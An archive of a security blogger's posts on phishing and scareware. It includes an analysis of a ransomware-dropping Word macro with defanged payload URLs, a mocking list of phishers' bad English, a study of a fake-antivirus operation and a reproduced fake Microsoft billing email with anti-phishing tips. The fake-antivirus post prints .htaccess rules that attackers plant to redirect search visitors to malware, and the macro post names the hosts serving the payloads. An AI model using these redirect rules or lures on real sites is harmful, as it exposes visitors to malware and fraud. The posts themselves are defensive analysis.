Archive

Archive for the ‘Phishing’ Category

Good day to you!

Khoroshiy den' dlya tebya!

The other day, I got this cryptic email. It read:

 

From: Wayne Millbrand <waynem@icon.co.za>
Date: 03/27/2017 2:23 PM (GMT-05:00)
To: ***
Subject: ***

Good day to you!

I have a rather delicate issue, which touches directly to you. Don’t be surprised how do I learned about you! The fact is that I have got already a second letter from the person, I do not know which asserts that you are fraud involved. He insists, that you forced him transfer funds on your PayPal account under fictional reason. However,with this information he pointed out your private data up to address:

First Last Name
Street Address
Town
State (with capitalization error)
Zip Code

Now he is collecting information and planing to contact the police. I advise you to view the information that he sent to me. I have attached Fine.doc with a copy of all of his messages.

Document was password-protected – 4299

Please explain to me what’s happening.  I hope that all of this is a silly misunderstanding.

Best regards,

Wayne Millbrand

Based on the fake email address and the tell-tale Anguished English, I concluded that this was just another phish. 

I usually delete these emails promptly, but this one had an interesting component to it: it came with a password protected MS Word document. This is somewhat unusual because they typically expect you to just launch the attachment and activate the payload immediately. 

So it appears that the attack strategy was to:

  • Send a threatening email
  • Add some publicly available information about the recipient to make it look genuine
  • Encrypt the document in order to hide the payload from an anti-virus scanner
  • Provide the password in the email to allow the user to open and decrypt the file
  • Activate the payload in the MS Word document and infect the user’s machine

Inside the encrypted Word document, I found the following API declarations, variable names, and this code:

Shell32.dll   ShellExecuteA
Kernel32     GetTempPathA
Kernel32     GetTempFileNameA
URLMon"     URLDownloadToFileA

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid () As Byte
Dim kmvbf As Long
Dim dfety As Long
Dim bvjwi As Long
Dim wbdys As Long
Dim dvywi (256) As Byte
Dim wdals As Long
Dim dwiqh As Long

API Declarations and Variables
Yaacov Apelbaum-Document OpenYaacov Apelbaum-Functions

This seems to be a variation on an old theme where as soon as the user opens the file, the routine executes a URL file download from one of these two backup sources: 

h t t p://adenzia.ch/_vti_cnf/bug.gif
h t t p://kingofstreets.de/class/meq.gif

The macro is quite sophisticated, it can even prompt the user to disable their firewall if the download fails. Both GIFs—despite having an appropriate header block and some image content bytes—actually carry the encoded malware.

The macro uses a subroutine to extract the executable binary from the downloaded GIF. It stores the binary in a temp file, appends an “exe” extension to it, and then using the Explorer function ShellExecuteA, executes it in order to install additional malware. In this case, it was ransomware that encrypted the Documents folder. 

Yaacov Apelbaum-Ransomware e

The installed ransomware in action

Interestingly, the first compromised URL used by the malware was website that belongs to Adenzia.ch, a Swiss accounting and corporate services firm that ironically advertises itself as providing “Privacy and secure Data storage” and:

  Accounting services

  Secure financial services

  Data entry from paper to digital

  Scanning paper data to digital

  Archiving data anonymously

Adenzia.ch 2

Adenzia

The before and after the breach Adenzia.ch websites

 

Mafia Scripts

The Kingofstreets.de website

Another noteworthy strategy is that both, the repurposed Swiss Adenzia.ch financial site as well as the second German kingofstreets.de gaming site required a login. This provides an additional layer of security by preventing internet security scanners from tracking down the payload by trying to follow a link to the malware.

From the variable naming convention and the language of the email itself, it seems that the writer is non native English speaker. The metadata from the Word document further supports this and suggest a strong link to a Russian origin. First, the author’s name was preserved as виньда (Vinda) and the company name came up as: SPecialiST RePack. 

SPecialiST RePack Metadata

SPecialiST RePack is a Russian digital publisher that is used for repackaging software.  According to Emsisoft malware database, they are a source of a large number of infected files and products.

SPecialiST RePack

SPecialiST RePack infected content

As far as the unfortunate Adenzia.ch site, it seems that it was breached in the past few months as the Wayback Machine still shows them operational on October 4, 2016.

I’ve tried to contact Adenzia and give them heads up that they need to have a look at their network. As of this date, I haven’t heard back from them. This could be an indication that either the site was a front for malware distribution from the get go or else it is no longer in business and has been abandoned.   

 

© Copyright 2017 Yaacov Apelbaum, All Rights Reserved.

Anguished English

February 19, 2016 1 comment

 

Yaacov Apelbaum - Anguished English

“Thy sin’s not accidental, but a trade.” (from Measure For Measure)

Getting bombarded by Phishers is no fun but sometimes these communications offer some comic relief. This posting is dedicated to the anguished English and linguistic jewels they produce. May the tormented ghost of Shakespeare continue to sabotage their exploits.

Here are my top ten favorites:

1. Starting the message in one language and then switching to another as in “Dear Cliente,”

2. Getting subject verb agreement wrong as in “Your account just make…”

3. Poor punctuation as in “Due to concerns, for safety and the integrity…”

4. Nonsense content as in “Most of your date in our database were encrypted…”

5. Poor formatting as in missing a space after a period.that’s right.

6. Wrong capitalization as in “This is the Last reminder…”

7. Poor grammar as in “If this message sent as Junk or Spam, its just an error…”

8. Excessive use of exclamation marks as in “Update Required!!”

9. Poor spelling as in “It has come to out [our] attention that…”

10. Failure to do basic arithmetic accurately as in “$254.99 + $20.00 = $374.99”

 

Yaacov Apelbaum-Anguished English PayPal 1

 

Yaacov Apelbaum-Anguished English PayPal 2

 

Yaacov Apelbaum-Anguished English PayPal 3

 

Yaacov Apelbaum-Anguished English PayPal 4

 

Yaacov Apelbaum-Anguished English PayPal 5

 

Yaacov Apelbaum-Anguished English PayPal 6

 

Yaacov Apelbaum-Anguished English PayPal 7

Yaacov Apelbaum-Anguished English PayPal 10

Yaacov Apelbaum-Anguished English PayPal 8

 

Yaacov Apelbaum-Anguished English PayPal 9

 

© Copyright 2016 Yaacov Apelbaum, All Rights Reserved.

Categories: PayPal, Phishing, Pirates, scam Tags:

The Anti-Virus Virus Part II

January 2, 2011 2 comments

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SOE’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware, (a variety of bogus anti-virus applications), is downloaded when you click on a link in a page returned by a search engine.  The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly.  If you navigate to the site via a bookmark or manually enter the address it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site and thus delay its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines, (which forms the majority of visits) will keep getting redirected to the malware download.

The underlining technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

 

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]

RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The results of this re-route, is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.

Source and Authorship

I loaded Process Monitor and installed the copy of Antivitus2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional.  The installation created an entire registry hive that included several autoruns, browser search redirects, and a root kit.  I then fired-up TCPView and examined the application’s outgoing communication.  It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev).  The domains associated with the servers were registered by Bakasoftware.com which is currently hosted in Canada.

Interestingly, upon startup, the malware called the API GetKeyboardLayout checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania
    If it found one, it terminated itself, further proof that the designers targeted English users.  The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

    Marketing and Distribution

    For software to be commercially viable, it must have effective marketing and distribution channels.  The bogus Antivirus is no exception.  It turns out that even a few US companies have been associated with the distribution of this software.  Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributers including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

    The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including ”"WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

    We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.
    In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called "Scareware" applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.
    According to court records, as of February 11, 2009. Jain is officially listed as a fugitive from justice in the United States.
    Affiliate Program

    The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel permitting them to distribute different flavors of malware as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 to 90 percent commission on sales of the software. Such generous commissions can explain why these types of malware products are so popular among spammers.
    Yaacov Apelbaum-Bakasoftware Control Panel 
    Image 1: Bakasoftware Malware Administrative Download Control Panel
    In a true testament to their sophistication, the affiliate members have access to sophisticated web based statistics dashboard.  In it, the franchise owner can view KPIs that include: numbers of daily installs, number purchases by victim (and his CC number), refunds (Chargebacks), and commissions. With such access to real-time sales analytics, they are the envy of many fortune 500 sales organizations.
    Yaacov Apelbaum-Bakasoftware Sales Dashboard  
    Table 1: Bakasoftware Malware Sales Dashboard
    As you can see from Table 1, one affiliate installed 154,825 editions of the software in exactly 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a 2% conversation rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year. That’s some pocket change.
    Who says that crime doesn’t pay?
    © Copyright 2011 Yaacov Apelbaum All Rights Reserved.

Windows Live Credit Card Phishing

December 10, 2009 14 comments

Yaacov Apelbaum-Phishing

I recently received an email claiming to be from Microsoft Live. The email stated that due to some processing issues, they could not authorize my credit card and so I would need to login to their website to update my credit card information by clicking on their link.

Over the years, I have seen a number of these types of messages, but this was the first one targeting me personally.  After skimming through it, I realized that it was a blatant phishing attempt, nevertheless, I still marveled at the ingenuity of the scammers.

Yaacov Apelbaum-Fake MSN Image

Billing and Account Management

Dear Windows Live Hotmail member,
During our regularly scheduled account maintenance and verification procedures, our billing department was unable to authorize your current payment method information.

This might be due to either of the following reasons:

  1. A recent change in your personal information (i.e. change of address, credit card)
  2. Submitting invalid information during the initial Sign Up or upgrade process.
  3. An inability to accurately verify your selected payment method information due to an internal error within our processors.
    Please use the following link to update your payment method information :

http://billing.microsoft.com/logon.srf?action=SignIn&reason=auth&type=auto&uid=187&acct=49472101102

The above link may have been blocked for your privacy. To activate the link please look for the Show content link that is usually located on top of this message.

NOTE! If your account information is not updated within 48 hours then your ability to use your Windows Live Hotmail account will become restricted.

Thank you for using Windows Live Hotmail!
Please do not reply to this e-mail, as this is an unmonitored alias.

Yaacov Apelbaum-Fake Windows Live Image

  © 2009 Microsoft Corporation. All rights reserved.


Anatomy of a Phish


Yaacov Apelbaum-Anatomy of a Phish For the uninitiated, phishing (pronounced “fishing”) is a fraudulent attempt to acquire sensitive information from a user.  Such information can be: credit cards, user IDs, passwords, and/or account information.  It is often accomplished via email or phone

Phishing falls into the category of exploits  known as “ “social engineering”. Even though they are mostly low tech, (requiring neither sophisticated technology nor advanced programming), they can to be successful (especially the well executed and new exploits) because most people tend instinctively to do what they are told and will not challenge the authority and authenticity of what seems to be an official correspondence.

In a typical phishing scenario, the perpetrators (usually located offshore) send a simple email—claiming to be from the customer service department of a recognizable organization  (like a bank, on-line service, etc.)—the email will inform you of some  problem with your account. You are then instructed to provide details of your bank, email, or credit card account in order to correct this problem.

Even though, phishing exploits can have many variations, they can be grouped into the following are five usage scenarios:

1. Forged identities — In this exploit, the attacker creates an email address that is related to a reputable organization like “Windows Live Customer Support”. Even though on the surface, their email address looks legitimate (as in: billing@windowslive.com), it is not. If you’re not paying attention, it can be easy to mistake a message like this for a genuine customer support request.

2. Compromised accounts — In this exploit, the attacker uses a compromised user account to send an email to everyone in the address book for that account. An email you receive from a known account dramatically increases the credibility of that message, and therefore the likelihood of a successful phishing attack.

3. Direct phone calls — In this exploit, the scammer may contact you directly by phone, telling you that they work for some financial institution (may offer to lower your interest rates) or the fraud investigation departments.  They will inform you that your account has been breached and will directly ask you for your account details in order to verify it.

4. Bogus websites — In this exploit, the attacker will send you a link to what seems to be a functional website.  The site will include official-looking logos, language, or other identifying information taken directly from a legitimate websites. The address of the site will show resembles the name of a reputable company but with some spelling variations. For example, the name"microsoft.live.com" could appear instead as: “micorsoft.live.com

5. Social Network Harvesting — In this exploit, a communication from a scammer will ask you for personal information.  You may mistake it for an email from a friend wanting to reconnect. The email will include convincing details about your personal life which ware recovered from social networks such as LinkedIn, Facebook, etc.

In general, the objective of phishing is to recover your webmail credentials since the resale value of a legitimate web mail account on the black market can be as high as $2-$3—twice the amount they could get for a stolen credit card number.  So for a phisher, breaching several dozens accounts a day can be a lucrative business, making $100K-$500K for the life of the scam.

In the case of my phishing email, when I followed the link in it,  I was taken to a credit card entry form (Image 1). As I expected, the form looked genuine, it had all the right corporate trimmings: a Microsoft logo, copyright notice, and even a link to a help page (which ironically offered the following advice You should keep this number secret, protect it, and never write it on your card.”)

Yaacov Apelbaum-Phishing Credit Card Form

Image 1: Phishing Credit Card Entry Form

As with most phishing sites, I was expecting to find some bogus or misspelled Microsoft URL, but instead I was surprised to see that the web address of the webpage actually belonged to a company called Human & Technology H&T (Image 2), clearly, htech21.com doesn’t even sound like Microsoft.   I’ve checked the parent URL out and It turns out, that this company was at one point a legitimate Korean hardware manufacturer, than,  two years ago, their CEO was arrested and the company became the target of one of the biggest class-action lawsuits in history.

CEO Jeong Kuk-Kyo So what is the connection between htech21.com and this phishing expedition?  It appears that the perpetrators of this scam decided to cut some costs and instead of purchasing and hosting their own domain, they chose to break into the H&T corporate web site and place their credit card collection pages on it.  At one point, our scammers discovered that Human & Technology has gone out of business (this could also have been an inside job) and safely assumed that this orphaned website (which has not been updated for 3 years) is no longer being maintained or monitored, and as such, was a perfect staging platform for a phishing operation.

Yaacov Apelbaum-Phish Help WindowIt is also interesting to note, that the site’s help file focused on ATMs (Automated Teller Machines), strongly suggests that at least some of the phishing website contents have also been used in other scams.

Yaacov Apelbaum-Human & Technology Phishing Website Korean  Yaacov Apelbaum-Human & Technology Phishing Website English

Image 2: Phishing Host Website

It is hard to recognize legitimate customer service communications from phishing expeditions. This difficulty if further compounded by the fact that for many, using services such as Amazon, EBay, and e-banking has now become a  a way of life.  For most users, the potential inconvenience of being looked out of their favorite on-line services outweighs the risk of disclosing their account information. Unfortunately, the on-line services are not helping this situation either because most are either impossible to reach by phone or their offshore support centers are largely useless.

So how does one survive in the hostile jungle of email exploits? The following are my top 10 Do’s and Don’ts of email:

1.  Do Not open emails that have a wrong or incorrect spelling of your name. Phishers often harvest email addresses in balk and may not have your full name. Because of this, they will try to guess your name from your email address.

2.  Do Not open emails that are not addressed to you by name. Phishers will almost never personalize correspondences; they will refer to you as “Dear Customer” or “Dear Valued Customer” because they send balk solicitations to millions of email addresses.

3.  Do Not respond to any account management email requests that come from your bank. If your bank needs to reach you, they will send you an official letter or leave you a voice mail with a valid callback telephone number.

4.  Do Not open unsolicited emails. Nothing in life is free, this includes the invitation to view naked celebrities and the Prozac and Viagra offers in your inbox.

5.  Do Not use email links to go to any financial websites. Type in the URL yourself and save it as a bookmark.

6.  Do verify the website URL you are about to log into, check the spelling carefully before you provide your login details on any web page.  Pay close attention to domain name following the “http://” section of the address.  Many phishers will Intentionally create very long names to obfuscate the fake URL.

7.  Do log in to your on-line accounts regularly and look for unrecognized transactions.  Do the same with your monthly credit card statements.

8.  Do Not send your account details via email to anyone.  email traffic is unencrypted, so anyone on route can intercept the message.

9.  Do check that the Internet connection you are using is secure. Look for HTTPS in the address field of your browser.  You may also want to click on theEncrypted connection iconpadlock to view the actual server certificate.  This will help you verify that it was issued by a reputable authority and assigned to the company managing the website in question.

10.  Do make sure that you have an updated anti-virus software and that your firewall is turned on.

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.